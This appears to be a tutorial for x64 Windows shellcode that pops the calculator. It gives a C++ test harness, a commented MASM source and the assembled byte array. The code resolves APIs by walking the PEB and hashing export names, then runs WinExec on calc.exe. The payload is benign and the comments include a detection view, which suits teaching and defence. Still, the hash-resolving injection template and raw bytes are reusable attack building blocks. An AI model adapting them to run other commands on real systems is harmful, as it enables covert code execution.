x64 ShellCode 弹出计算器
Main.cpp
// Host harness for the payload assembled from Code.asm.
// Both routines live in the .asm file and are linked in with C linkage.
// (Note: `_INT3` — leading underscore + capital — is a name reserved for the
// implementation in C++; it happens to work here but is not portable.)
extern "C" {
    void PopCalculator();   // resolves APIs by hash, runs calc.exe, ends in ExitThread
    void _INT3();           // int 3: stops here when a debugger is attached
}

int main()
{
    _INT3();                // break first so the payload can be stepped through
    PopCalculator();        // ends by calling ExitThread, so control normally does not come back
    return 0;
}
Code.asm
PopCalculator proto
_INT3 proto

;-----------------------------------------------------------------------
; Position-independent x64 payload (MASM, Microsoft x64 ABI).
; Finds kernel32.dll through the PEB loader list, resolves exports by
; walking the export directory with a ror-7/add name hash, then calls
; LoadLibrary("user32.dll"), MessageBoxA(0,0,0,0), WinExec("calc.exe",1)
; and finally ExitThread(0).  The byte listing under "机器码" below is
; this source assembled, so every instruction here maps 1:1 to those bytes.
;
; Observable behaviour (detection view): reads the PEB via gs:[60h],
; walks Ldr.InInitializationOrderModuleList, parses an export table by
; hand instead of importing, and reaches WinExec through a register call.
;
; Hash: for each byte c of the name:  edx = ror(edx, 7) + (signed char)c
;
; WinExec : 0x1A22F51
; LoadLibrary : 0x0C917432
; MessageBoxA : 0x1E380A6A
; GetProcAddress : 0xBBAFDF85
;-----------------------------------------------------------------------
.code

;-----------------------------------------------------------------------
; void _INT3(void)
; Software breakpoint so a debugger attached to Main.cpp stops just before
; the payload runs.  Outside a debugger, int 3 raises a breakpoint exception.
;-----------------------------------------------------------------------
_INT3 proc
        int     3
        ret
_INT3 endp

;-----------------------------------------------------------------------
; void PopCalculator(void)   -- does not return (ends in ExitThread)
; ABI:   Microsoft x64.  Clobbers rbx, rsi, rdi, r14 (all callee-saved)
;        without saving them; tolerable only because the thread exits here.
; Regs:  rsi = kernel32 DllBase (kept across FindApi, which preserves rsi)
;        rbx = user32 DllBase after LoadLibrary
;        r14 = address of the API currently being called
; Stack: 100h reserved up front; each call site pushes its string argument
;        and then reserves shadow/alignment space so that rsp is 16-aligned
;        at every 'call r14' (entry rsp % 16 == 8).
;-----------------------------------------------------------------------
PopCalculator proc
        sub     rsp, 100h
        ;
        ; Get the kernel32 base address
        ;
        mov     rax, gs:[60h]               ; PEB
        mov     rax, [rax+18h]              ; Ldr
        mov     rax, [rax+30h]              ; InInitializationOrderModuleList
_kernel32:
        mov     rsi, [rax+10h]              ; DllBase
        mov     rbx, [rax+40h]              ; BaseDllName (UNICODE_STRING.Buffer, UTF-16)
        mov     rax, [rax]                  ; Flink -> next list entry
        cmp     dword ptr [rbx+0Ch], 00320033h  ; wide chars 6..7 == L"32" (matches "KERNEL32.DLL")
        jnz     _kernel32                   ; NOTE(review): only chars 6-7 are compared, and no list-end guard
        ;
        ; Call LoadLibrary
        ;
        mov     rcx, rsi                    ; rcx = kernel32 base
        mov     rdx, 0C917432h              ; rdx = hash of LoadLibrary (see header)
        call    FindApi
        mov     r14, rax                    ; r14 = LoadLibrary
        mov     rbx, 6C6Ch                  ; "ll\0..."
        push    rbx
        mov     rbx, 642E323372657375h      ; "user32.d" (little-endian)
        push    rbx                         ; stack now holds "user32.dll\0"
        mov     rcx, rsp                    ; rcx = lpLibFileName
        sub     rsp, 18h                    ; reserve argument space; 18h (+8 of the string) keeps rsp 16-aligned
                                            ; NOTE(review): 18h is below the ABI's 32-byte home area, so the
                                            ; 4th home slot overlaps the first 8 bytes of the string
        call    r14
        mov     rbx, rax                    ; rbx = user32 base
        ;
        ; Call MessageBoxA
        ;
        mov     rcx, rbx                    ; rcx = user32 base
        mov     rdx, 1E380A6Ah              ; rdx = hash of MessageBoxA
        call    FindApi
        mov     r14, rax                    ; r14 = MessageBoxA
        xor     r9, r9                      ; uType     = 0
        xor     r8, r8                      ; lpCaption = NULL
        xor     rdx, rdx                    ; lpText    = NULL
        xor     rcx, rcx                    ; hWnd      = NULL
        call    r14                         ; empty message box; reuses the 18h reserved above
        ;
        ; Call WinExec
        ;
        mov     rcx, rsi                    ; rcx = kernel32 base
        mov     rdx, 1A22F51h               ; rdx = hash of WinExec
        call    FindApi
        mov     r14, rax                    ; r14 = WinExec
        xor     rax, rax
        push    rax                         ; terminating zeros
        mov     rax, 6578652e636c6163h      ; "calc.exe" (little-endian)
        push    rax                         ; stack now holds "calc.exe\0"
        mov     rcx, rsp                    ; lpCmdLine = "calc.exe"
        sub     rsp, 20h                    ; reserve 32-byte home area for the call
        mov     rdx, 1                      ; uCmdShow = 1 (SW_SHOWNORMAL)
        call    r14
        ;
        ; Call ExitThread (resolved via GetProcAddress rather than by hash)
        ;
        mov     rcx, rsi                    ; rcx = kernel32 base
        mov     rdx, 3148865413             ; = 0BBAFDF85h, hash of GetProcAddress (written in decimal, unlike the others)
        call    FindApi
        mov     r14, rax                    ; r14 = GetProcAddress
        mov     rax, 006461h                ; "ad\0"
        push    rax
        mov     rax, 6572685474697845h      ; "ExitThre"
        push    rax                         ; stack now holds "ExitThread\0"
        mov     rcx, rsi                    ; hModule    = kernel32
        mov     rdx, rsp                    ; lpProcName = "ExitThread"
        sub     rsp, 20h                    ; reserve 32-byte home area for the call
        call    r14                         ; GetProcAddress
        mov     r14, rax                    ; r14 = ExitThread
        add     rsp, 188h                   ; unwind all of it: 100h + 18h + 20h + 20h + three pairs of pushes (30h)
        sub     rsp, 18h                    ; reserve argument space; rsp % 16 == 0 again at the call
        xor     rcx, rcx                    ; dwExitCode = 0
        call    r14                         ; ExitThread -- does not return
        ret                                 ; unreachable in practice

;-----------------------------------------------------------------------
; FindApi -- local routine, reached only through 'call FindApi' above.
; In:    rcx = module base, rdx = 32-bit name hash (ror 7 / add per byte)
; Out:   rax = VA of the first export whose name hashes to rdx
; Clobb: rbx, rdi, rcx, rdx, flags (rsi is saved and restored).
;        Requires DF = 0 for lods.  NumberOfNames is never read, so the
;        name loop has no upper bound: an unmatched hash walks past the array.
;-----------------------------------------------------------------------
FindApi:
        ;
        ; rcx - DLL base address
        ; rdx - function hash value
        ;
        sub     rsp, 40h
        push    rsi
        mov     rdi, rdx                    ; rdi = wanted hash
        mov     rbx, rcx                    ; rbx = module base
        mov     rsi, [rbx+3Ch]              ; e_lfanew (loaded as 8 bytes)
        mov     rax, rsi
        shl     rax, 54
        shr     rax, 54                     ; keep only the low 10 bits: assumes e_lfanew < 400h
        mov     rsi, [rbx+rax+88h]          ; rsi = Export Table RVA (DataDirectory[0] of the PE32+ optional header)
        shl     rsi, 32
        shr     rsi, 32                     ; drop the Size half, keep VirtualAddress
        add     rsi, rbx                    ; rsi = the base of Export Table
        push    rsi
        mov     esi, [rsi+20h]              ; esi = RVA of AddressOfNames
        add     rsi, rbx                    ; rsi = VA of AddressOfNames
        xor     rcx, rcx
        dec     ecx                         ; ecx = -1 so the first inc yields index 0
find_loop:
        inc     ecx                         ; ecx = index of array
        lods    dword ptr [rsi]             ; eax = next name RVA, rsi += 4
        add     rax, rbx                    ; rax = the base of a function string
        xor     edx, edx                    ; edx = running hash
hash_loop:
        cmp     byte ptr [rax], 0           ; end of name?
        je      isEqual
        ror     edx, 7
        push    rcx
        movsx   ecx, byte ptr [rax]         ; character, sign-extended
        add     edx, ecx                    ; edx = one of function's hashes
        pop     rcx
        inc     rax
        jmp     hash_loop
isEqual:
        cmp     edx, edi                    ; hash matches the requested one?
        jnz     find_loop
        pop     rsi                         ; rsi = the base of Export Table
        mov     edx, [rsi+24h]              ; edx = RVA of AddressOfNameOrdinals
        add     rdx, rbx                    ; rdx = VA of AddressOfNameOrdinals
        movsx   ecx, word ptr [rdx+rcx*2]   ; ecx = the index of AddressOfFunctions (sign-extended; ordinals are unsigned, so only exact while < 8000h)
        mov     edx, [rsi+1Ch]              ; edx = RVA of AddressOfFunctions
        add     rdx, rbx                    ; rdx = VA of AddressOfFunctions
        mov     eax, [rdx+rcx*4]            ; eax = the RVA of base of function
        add     rax, rbx                    ; rax = the VA of base of function
        pop     rsi
        add     rsp, 40h
        ret
PopCalculator endp
end
机器码
"\x48\x81\xEC\x00\x01\x00\x00\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x48\x8B\x40\x18\x48\x8B\x40\x30\x48\x8B\x70\x10\x48\x8B\x58\x40\x48\x8B\x00\x81\x7B\x0C\x33\x00\x32\x00\x75\xEC\x48\x8B\xCE\x48\xC7\xC2\x32\x74\x91\x0C\xE8\xC0\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC3\x6C\x6C\x00\x00\x53\x48\xBB\x75\x73\x65\x72\x33\x32\x2E\x64\x53\x48\x8B\xCC\x48\x83\xEC\x18\x41\xFF\xD6\x48\x8B\xD8\x48\x8B\xCB\x48\xC7\xC2\x6A\x0A\x38\x1E\xE8\x8E\x00\x00\x00\x4C\x8B\xF0\x4D\x33\xC9\x4D\x33\xC0\x48\x33\xD2\x48\x33\xC9\x41\xFF\xD6\x48\x8B\xCE\x48\xC7\xC2\x51\x2F\xA2\x01\xE8\x6D\x00\x00\x00\x4C\x8B\xF0\x48\x33\xC0\x50\x48\xB8\x63\x61\x6C\x63\x2E\x65\x78\x65\x50\x48\x8B\xCC\x48\x83\xEC\x20\x48\xC7\xC2\x01\x00\x00\x00\x41\xFF\xD6\x48\x8B\xCE\x48\xBA\x85\xDF\xAF\xBB\x00\x00\x00\x00\xE8\x38\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC0\x61\x64\x00\x00\x50\x48\xB8\x45\x78\x69\x74\x54\x68\x72\x65\x50\x48\x8B\xCE\x48\x8B\xD4\x48\x83\xEC\x20\x41\xFF\xD6\x4C\x8B\xF0\x48\x81\xC4\x88\x01\x00\x00\x48\x83\xEC\x18\x48\x33\xC9\x41\xFF\xD6\xC3\x48\x83\xEC\x40\x56\x48\x8B\xFA\x48\x8B\xD9\x48\x8B\x73\x3C\x48\x8B\xC6\x48\xC1\xE0\x36\x48\xC1\xE8\x36\x48\x8B\xB4\x03\x88\x00\x00\x00\x48\xC1\xE6\x20\x48\xC1\xEE\x20\x48\x03\xF3\x56\x8B\x76\x20\x48\x03\xF3\x48\x33\xC9\xFF\xC9\xFF\xC1\xAD\x48\x03\xC3\x33\xD2\x80\x38\x00\x74\x0F\xC1\xCA\x07\x51\x0F\xBE\x08\x03\xD1\x59\x48\xFF\xC0\xEB\xEC\x3B\xD7\x75\xE0\x5E\x8B\x56\x24\x48\x03\xD3\x0F\xBF\x0C\x4A\x8B\x56\x1C\x48\x03\xD3\x8B\x04\x8A\x48\x03\xC3\x5E\x48\x83\xC4\x40\xC3" { 0x48, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x8B, 0x70, 0x10, 0x48, 0x8B, 0x58, 0x40, 0x48, 0x8B, 0x00, 0x81, 0x7B, 0x0C, 0x33, 0x00, 0x32, 0x00, 0x75, 0xEC, 0x48, 0x8B, 0xCE, 0x48, 0xC7, 0xC2, 0x32, 0x74, 0x91, 0x0C, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x48, 0xC7, 0xC3, 0x6C, 0x6C, 0x00, 0x00, 0x53, 0x48, 0xBB, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2E, 0x64, 0x53, 0x48, 0x8B, 0xCC, 0x48, 0x83, 
0xEC, 0x18, 0x41, 0xFF, 0xD6, 0x48, 0x8B, 0xD8, 0x48, 0x8B, 0xCB, 0x48, 0xC7, 0xC2, 0x6A, 0x0A, 0x38, 0x1E, 0xE8, 0x8E, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x4D, 0x33, 0xC9, 0x4D, 0x33, 0xC0, 0x48, 0x33, 0xD2, 0x48, 0x33, 0xC9, 0x41, 0xFF, 0xD6, 0x48, 0x8B, 0xCE, 0x48, 0xC7, 0xC2, 0x51, 0x2F, 0xA2, 0x01, 0xE8, 0x6D, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x48, 0x33, 0xC0, 0x50, 0x48, 0xB8, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x50, 0x48, 0x8B, 0xCC, 0x48, 0x83, 0xEC, 0x20, 0x48, 0xC7, 0xC2, 0x01, 0x00, 0x00, 0x00, 0x41, 0xFF, 0xD6, 0x48, 0x8B, 0xCE, 0x48, 0xBA, 0x85, 0xDF, 0xAF, 0xBB, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x38, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x48, 0xC7, 0xC0, 0x61, 0x64, 0x00, 0x00, 0x50, 0x48, 0xB8, 0x45, 0x78, 0x69, 0x74, 0x54, 0x68, 0x72, 0x65, 0x50, 0x48, 0x8B, 0xCE, 0x48, 0x8B, 0xD4, 0x48, 0x83, 0xEC, 0x20, 0x41, 0xFF, 0xD6, 0x4C, 0x8B, 0xF0, 0x48, 0x81, 0xC4, 0x88, 0x01, 0x00, 0x00, 0x48, 0x83, 0xEC, 0x18, 0x48, 0x33, 0xC9, 0x41, 0xFF, 0xD6, 0xC3, 0x48, 0x83, 0xEC, 0x40, 0x56, 0x48, 0x8B, 0xFA, 0x48, 0x8B, 0xD9, 0x48, 0x8B, 0x73, 0x3C, 0x48, 0x8B, 0xC6, 0x48, 0xC1, 0xE0, 0x36, 0x48, 0xC1, 0xE8, 0x36, 0x48, 0x8B, 0xB4, 0x03, 0x88, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xE6, 0x20, 0x48, 0xC1, 0xEE, 0x20, 0x48, 0x03, 0xF3, 0x56, 0x8B, 0x76, 0x20, 0x48, 0x03, 0xF3, 0x48, 0x33, 0xC9, 0xFF, 0xC9, 0xFF, 0xC1, 0xAD, 0x48, 0x03, 0xC3, 0x33, 0xD2, 0x80, 0x38, 0x00, 0x74, 0x0F, 0xC1, 0xCA, 0x07, 0x51, 0x0F, 0xBE, 0x08, 0x03, 0xD1, 0x59, 0x48, 0xFF, 0xC0, 0xEB, 0xEC, 0x3B, 0xD7, 0x75, 0xE0, 0x5E, 0x8B, 0x56, 0x24, 0x48, 0x03, 0xD3, 0x0F, 0xBF, 0x0C, 0x4A, 0x8B, 0x56, 0x1C, 0x48, 0x03, 0xD3, 0x8B, 0x04, 0x8A, 0x48, 0x03, 0xC3, 0x5E, 0x48, 0x83, 0xC4, 0x40, 0xC3 };
